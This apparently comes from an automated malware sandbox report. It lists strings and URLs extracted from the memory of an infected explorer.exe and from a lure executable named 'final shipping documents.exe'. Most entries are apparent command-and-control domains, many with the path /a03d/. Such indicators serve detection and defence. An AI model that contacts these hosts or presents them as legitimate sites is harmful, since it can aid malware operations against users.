Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2462603390.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271435377.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273498189.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009336000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2462603390.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271435377.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273498189.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009336000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000001A.00000003.2468240857.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.
Source: explorer.exe, 0000001A.00000003.2468240857.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeom/xap/1.0/sTy
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2462603390.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271435377.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2273498189.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009336000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000A.00000002.2464934509.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1504268919.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.2464899770.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.
Source: final shipping documents.exe, 00000000.00000002.1504736152.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, GcrdXwPgmZ.exe, 0000000B.00000002.1567368332.00000000029CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1fuli9902.shop
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1fuli9902.shop/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1fuli9902.shop/a03d/www.oonlightshadow.shop
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1fuli9902.shopReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.5970.pizza
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.5970.pizza/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.5970.pizza/a03d/www.eepvid.xyz
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.5970.pizzaReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agfov4u.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agfov4u.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agfov4u.xyz/a03d/www.leurdivin.online
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agfov4u.xyzReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live/a03d/www.voyagu.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.liveReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alata.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alata.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alata.xyz/a03d/www.enelog.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.alata.xyzReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.argloscaremedia.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.argloscaremedia.info/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.argloscaremedia.info/a03d/www.otelhafnia.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.argloscaremedia.infoReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ategorie-polecane-831.buzz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ategorie-polecane-831.buzz/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ategorie-polecane-831.buzz/a03d/www.yselection.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ategorie-polecane-831.buzzReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.fun
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.fun/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.fun/a03d/www.elnqdjc.shop
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.funReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.info/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.info/a03d/www.enelog.xyz
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.infoReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cebepu.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cebepu.info/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cebepu.info/a03d/www.argloscaremedia.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cebepu.infoReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz/a03d/www.5970.pizza
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz/a03d/www.mmarketing.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyzReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyz/a03d/www.alata.xyz
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyz/a03d/www.atidiri.fun
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyzReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shop
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shop/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shop/a03d/www.encortex.beauty
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shopReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.encortex.beauty
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.encortex.beauty/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.encortex.beauty/a03d/www.cebepu.info
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.encortex.beautyReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz/a03d/www.erpangina-treatment-views.sbs
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz/a03d/www.lsaadmart.store
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyzReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erpangina-treatment-views.sbs
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erpangina-treatment-views.sbs/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erpangina-treatment-views.sbs/a03d/www.ings-hu-13.today
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erpangina-treatment-views.sbsReferer:
Source: explorer.exe, 0000000A.00000002.2462603390.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.haoyun.website
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.haoyun.website/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.haoyun.website/a03d/www.duxrib.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.haoyun.websiteReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ings-hu-13.today
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ings-hu-13.today/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ings-hu-13.today/a03d/www.agfov4u.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ings-hu-13.todayReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop/a03d/www.aja168e.live
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shopReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leurdivin.online
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leurdivin.online/a03d/
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leurdivin.online/a03d/www.romatografia.online
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leurdivin.onlineReferer:
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lsaadmart.store
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lsaadmart.store/a03d/
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lsaadmart.store/a03d/www.duxrib.xyz
Source: explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.lsaadmart.storeReferer:
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mmarketing.xyz
Source: explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mmarketing.xyz/a03d/
